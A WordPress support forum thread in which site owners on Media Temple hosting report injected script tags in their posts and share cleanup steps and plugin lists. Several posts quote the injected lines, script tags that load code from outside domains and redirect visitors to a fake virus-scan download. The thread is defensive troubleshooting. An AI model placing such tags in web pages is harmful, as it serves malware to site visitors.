Support » Fixing WordPress » Media Temple oeaou hack

  • Hi,
    I looked in one of my pages today and now all of a sudden all my pages and posts have <script src=”http://ue.oeaou.com/31″></script> when you view the page in the HTML.

    Was my site hacked or was this put in here by a plugin?

Viewing 15 replies - 1 through 15 (of 71 total)
  • I got the same thing. What plugins do you use? Maybe we have some of the same ones.

    I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.

    Well, I had the same problem. MediaTemple is my hosting provider, and they help me out with this. This is a WordPress Redirect Exploit hack that put a line of code on your database table wp_posts and wp_cats_posts

    The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar

    <script src=”http://ae.awaue.com/7″></script>
    <script src=”http://ue.oeaou.com/31″></script>
    <script src=”http://ie.eracou.com/3″></script>
    <script src=”http://ao.euuaw.com/9″></script>

    You must delete all of these lines

    Symptoms
    * Visitors viewing posts on your blog may be redirected to third-party sites.
    * Visitors may also be redirected to qooglesearch.com, which has already been disabled.

    Clean-Up

    Search in your database (specially in “wp_posts” and “wp_cats_posts” tables for strings like these and delete it.

    Info take it from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    I don’t know if maybe some plugin is doing these. I have the following plugins, let me know if you have the same or wich one do you have:

    Adminimize
    Akismet
    cforms
    Cleanup WordPress
    Google Analyticator
    Google News Sitemap
    Google XML Sitemaps
    HeadSpace2
    Insights
    jQuery Lightbox For Native Galleries
    MobilePress
    Podcasting Plugin by TSG
    Post Tabs
    Really Simple CAPTCHA
    Revision Control
    SEO Friendly Images
    WordPress.com Stats
    WP-PageNavi
    WP-UserOnline
    WP Geo
    ZD YouTube FLV Player

    Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.

    I’ve noticed the same problem on a few Media Template WordPress websites this morning. The fix above from Media Templates site ended up fixing it.

    Same problem here today on MediaTemplae.
    The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.

    Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.

    Here are the plugins I am using:
    Akismet
    All in One Favicon
    Announcement and Vertical Scroll News
    BM Custom Login
    Constant Contact API
    Kimili Flash Embed
    Store Locator

    It looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me login. MediaTemple is working on it, but at this point, I’m thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.

    Count me in. Found it on mine too.
    And I’m on media temple.

    <script src=”http://ue.oeaou.com/31″></script>

    This redirects people to a “Virus Scan” and asks them to download the “fix”

    WOW!
    Now I just have a big fat “Error establishing a database connection” on my home page.

    I went through the cleanup process as mentioned by mediosia
    I’m good to go for now

    mrmist

    (@mrmist)

    Forum Janitor

    Seems to be a media temple issue, will sticky this for now.

    http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.

    fixed here too by removing all mentions via sql, but what a nightmare, esp is you have a few databases & multiple installs.

    On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:

    Akismet
    WP-Stats
    WP-Pagenavi

    @iso50 damn, they didn’t clean my DBs, just sent me links on how to do it my self & more or less said it’s not their problem.

    Same again
    Also on WordPress hosted by MediaTemple
    The only ones I have in common is

    Akismet
    WP-Stats

    Hopefully be able to clean up the database as per mediatemple suggestion…not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!

Viewing 15 replies - 1 through 15 (of 71 total)
  • The topic ‘Media Temple oeaou hack’ is closed to new replies.